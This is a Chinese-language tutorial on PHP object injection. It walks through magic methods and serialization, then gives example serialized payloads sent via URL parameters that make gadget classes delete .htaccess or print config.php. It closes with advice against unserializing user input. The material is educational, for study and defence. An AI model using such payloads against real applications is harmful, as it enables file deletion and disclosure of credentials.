一文帶你搞懂PHP對象註入
背景
php對象註入是一個非常常見的漏洞,這個類型的漏洞雖然有些難以利用,但仍舊非常危險,為瞭理解這個漏洞,請讀者具備基礎的php知識。
漏洞案例
如果你覺得這是個渣渣洞,那麼請看一眼這個列表,一些被審計狗挖到過該漏洞的系統,你可以發現都是一些耳熟能詳的玩意(就國外來說)
- WordPress 3.6.1
- Magento 1.9.0.1
- Joomla 3.0.3
- Ip board 3.3.5
除此之外等等一堆系統,八成可能大概在這些還有其他的php程序中還有很多這種類型的漏洞,所以不妨考慮坐下喝杯咖啡並且試著去理解這篇文章。
PHP類和對象
類和變量是非常容易理解的php概念,打個比方,下面的代碼在一個類中定義瞭一個變量和一個方法。
#!php <?php class TestClass { // 一個變量 public $variable = 'This is a string'; // 一個簡單的方法 public function PrintVariable() { echo $this->variable; } } // 創建一個對象 $object = new TestClass(); // 調用一個方法 $object->PrintVariable(); ?>
php magic方法
php類可能會包含一些特殊的函數叫magic函數,magic函數命名是以符號“__”開頭的,比如 __construct, __destruct, __toString, __sleep, __wakeup 和其他的一些玩意。
這些函數在某些情況下會自動調用,比如:
__construct 當一個對象創建時調用 (constructor) __destruct 當一個對象被銷毀時調用 (destructor) __ toString當一個對象被當作一個字符串使用
為瞭更好的理解magic方法是如何工作的,讓我們添加一個magic方法在我們的類中。
#!php <?php class TestClass { // 一個變量 public $variable = 'This is a string'; // 一個簡單的方法 public function PrintVariable() { echo $this->variable . '<br />'; } // Constructor public function __construct() { echo '__construct <br />'; } // Destructor public function __destruct() { echo '__destruct <br />'; } // Call public function __toString() { return '__toString<br />'; } } // 創建一個對象 // __construct會被調用 $object = new TestClass(); // 創建一個方法 // 'This is a string' 這玩意會被輸出 $object->PrintVariable(); // 對象被當作一個字符串 // __toString 會被調用 echo $object; // End of PHP script // php腳本要結束瞭, __destruct會被調用 ?>
這個腳本會輸出這狗樣:
__construct
This is a string
__toString
__destruct
php對象序列化
php允許保存一個對象方便以後重用,這個過程被稱為序列化,打個比方,你可以保存一個包含著用戶信息的對象方便等等重用。
為瞭序列化一個對象,你需要調用 “serialize”函數,函數會返回一個字符串,當你需要用到這個對象的時候可以使用“unserialize”去重建對象。
讓我們在序列化丟進那個例子,看看序列化張什麼樣。
</pre> <pre> #!php <?php // 某類 class User { // 類數據 public $age = 0; public $name = ''; // 輸出數據 public function PrintData() { echo 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />'; } } // 創建一個對象 $usr = new User(); // 設置數據 $usr->age = 20; $usr->name = 'John'; // 輸出數據 $usr->PrintData(); // 輸出序列化之後的數據 echo serialize($usr); ?>
它會輸出
User John is 20 years old.
O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}
你可以看到序列化之後的數據中 有 20和John,其中沒有任何跟類有關的東西,隻有其中的數據被數據化。
為瞭使用這個對象,我們用unserialize重建對象。
#!php <?php // 某類 class User { // Class data public $age = 0; public $name = ''; // Print data public function PrintData() { echo 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />'; } } // 重建對象 $usr = unserialize('O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}'); // 調用PrintData 輸出數據 $usr->PrintData(); ?>
這會輸出
User John is 20 years old
序列化magic函數
magic函數constructor (__construct)和 destructor (__destruct) 是會在對象創建或者銷毀時自動調用,其他的一些magic函數會在serialize 或者 unserialize的時候被調用。
__sleep magic方法在一個對象被序列化的時候調用。__wakeup magic方法在一個對象被反序列化的時候調用。
註意 __sleep 必須返回一個數組與序列化的變量名。
#!php <?php class Test { public $variable = 'BUZZ'; public $variable2 = 'OTHER'; public function PrintVariable() { echo $this->variable . '<br />'; } public function __construct() { echo '__construct<br />'; } public function __destruct() { echo '__destruct<br />'; } public function __wakeup() { echo '__wakeup<br />'; } public function __sleep() { echo '__sleep<br />'; return array('variable', 'variable2'); } } // 創建一個對象,會調用 __construct $obj = new Test(); // 序列化一個對象,會調用 __sleep $serialized = serialize($obj); //輸出序列化後的字符串 print 'Serialized: ' . $serialized . <br />'; // 重建對象,會調用 __wakeup $obj2 = unserialize($serialized); //調用 PintVariable, 會輸出數據 (BUZZ) $obj2->PrintVariable(); // php腳本結束,會調用 __destruct ?>
這玩意會輸出:
__construct
__sleep
Serialized: O:4:"Test":2:
{s:8:"variable";s:4:"BUZZ";s:9:"variable2";s:5:"OTHER";}
__wakeup
BUZZ
__destruct
__destruct
你可以看到,我們創建瞭一個對象,序列化瞭它(然後__sleep被調用),之後用序列化對象重建後的對象創建瞭另一個對象,接著php腳本結束的時候兩個對象的__destruct都會被調用。
php對象註入
現在我們理解瞭序列化是如何工作的,我們該如何利用它?事實上,利用這玩意的可能性有很多種,關鍵取決於應用程序的流程與,可用的類,與magic函數。
記住序列化對象的值是可控的。
你可能會找到一套web程序的源代碼,其中某個類的__wakeup 或者 __destruct and其他亂七八糟的函數會影響到web程序。
打個比方,我們可能會找到一個類用於臨時將日志儲存進某個文件,當__destruct被調用時,日志文件會被刪除。然後代碼張這狗樣。
#!php <?php class LogFile { // log文件名 public $filename = 'error.log'; // 某代碼,儲存日志進文件 public function LogData($text) { echo 'Log some data: ' . $text . '<br />'; file_put_contents($this->filename, $text, FILE_APPEND); } // Destructor 刪除日志文件 public function __destruct() { echo '__destruct deletes "' . $this->filename . '" file. <br />'; unlink(dirname(__FILE__) . '/' . $this->filename); } } ?>
某例子關於如何使用這個類
#!php <?php include 'logfile.php'; // 創建一個對象 $obj = new LogFile(); // 設置文件名和要儲存的日志數據 $obj->filename = 'somefile.log'; $obj->LogData('Test'); // php腳本結束啦,__destruct被調用,somefile.log文件被刪除。 ?>
在其他的腳本,我們可能又恰好找到一個調用“unserialize”函數的,並且恰好變量是用戶可控的,又恰好是$_GET之類的什麼玩意的。
#!php <?php include 'logfile.php'; // ... 一些狗日的代碼和 LogFile 類 ... // 簡單的類定義 class User { // 類數據 public $age = 0; public $name = ''; // 輸出數據 public function PrintData() { echo 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />'; } } // 重建 用戶輸入的 數據 $usr = unserialize($_GET['usr_serialized']); ?>
你看,這個代碼調用瞭 “LogClass” 類,並且有一個 “unserialize” 值是我們可以註入的。
所以構造類似這樣的東西:
script.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}
究竟發生瞭什麼呢,因為輸入是可控的,所以我們可以構造任意的序列化對象,比如:
#!php <?php $obj = new LogFile(); $obj->filename = '.htaccess'; echo serialize($obj) . '<br />'; ?>
這個會輸出
O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess";}
__destruct deletes ".htaccess" file.
現在我們將構造過後的序列化對象發送給剛才的腳本:
script.php?usr_serialized=O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess”;}
這會輸出
__destruct deletes ".htaccess" file.
現在 .htaccess 已經被幹掉瞭,因為腳本結束時 __destruct會被調用。不過我們已經可以控制“LogFile”類的變量啦。
這就是漏洞名稱的由來:變量可控並且進行瞭unserialize操作的地方註入序列化對象,實現代碼執行或者其他坑爹的行為。
雖然這不是一個很好的例子,不過我相信你可以理解這個概念,unserialize自動調用 __wakeup 和 __destruct,接著攻擊者可以控制類變量,並且攻擊web程序。
常見的註入點
先不談 __wakeup 和 __destruct,還有一些很常見的註入點允許你利用這個類型的漏洞,一切都是取決於程序邏輯。
打個比方,某用戶類定義瞭一個__toString為瞭讓應用程序能夠將類作為一個字符串輸出(echo $obj) ,而且其他類也可能定義瞭一個類允許__toString讀取某個文件。
#!php <?php // … 一些include ... class FileClass { // 文件名 public $filename = 'error.log'; //當對象被作為一個字符串會讀取這個文件 public function __toString() { return file_get_contents($this->filename); } } // Main User class class User { // Class data public $age = 0; public $name = ''; // 允許對象作為一個字符串輸出上面的data public function __toString() { return 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />'; } } // 用戶可控 $obj = unserialize($_GET['usr_serialized']); // 輸出 __toString echo $obj; ?>
so,我們構造url
script.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}
再想想,如果我們用序列化調用 FileClass呢
我們創建利用代碼
#!php <?php $fileobj = new FileClass(); $fileobj->filename = 'config.php'; echo serialize($fileobj); ?>
接著用生成的exp註入url
script.php?usr_serialized=O:9:"FileClass":1:{s:8:"filename";s:10:"config.php”;}
接著網頁會輸出 config.php的源代碼
#!php
<?php
$private_data = 'MAGIC';
?>
ps:我希望這讓你能夠理解。
其他的利用方法
可能其他的一些magic函數海存在利用點:比如__call 會在對象調用不存在的函數時調用,__get 和 __set會在對象嘗試訪問一些不存在的類,變量等等時調用。
不過需要註意的是,利用場景不限於magic函數,也有一些方式可以在一半的函數中利用這個漏洞,打個比方,一個模塊可能定義瞭一個叫get的函數進行一些敏感的操作,比如訪問數據庫,這就可能造成sql註入,取決於函數本身的操作。
如何利用或者避免這個漏洞
別在任何用戶可控的地方使用“unserialize”,可以考慮“json_decode“
結論
雖然很難找到而且很難利用,但是這真的真的很嚴重,可以導致各種各樣的漏洞。
到此這篇關於一文帶你搞懂PHP對象註入的文章就介紹到這瞭,更多相關PHP對象註入內容請搜索WalkonNet以前的文章或繼續瀏覽下面的相關文章希望大傢以後多多支持WalkonNet!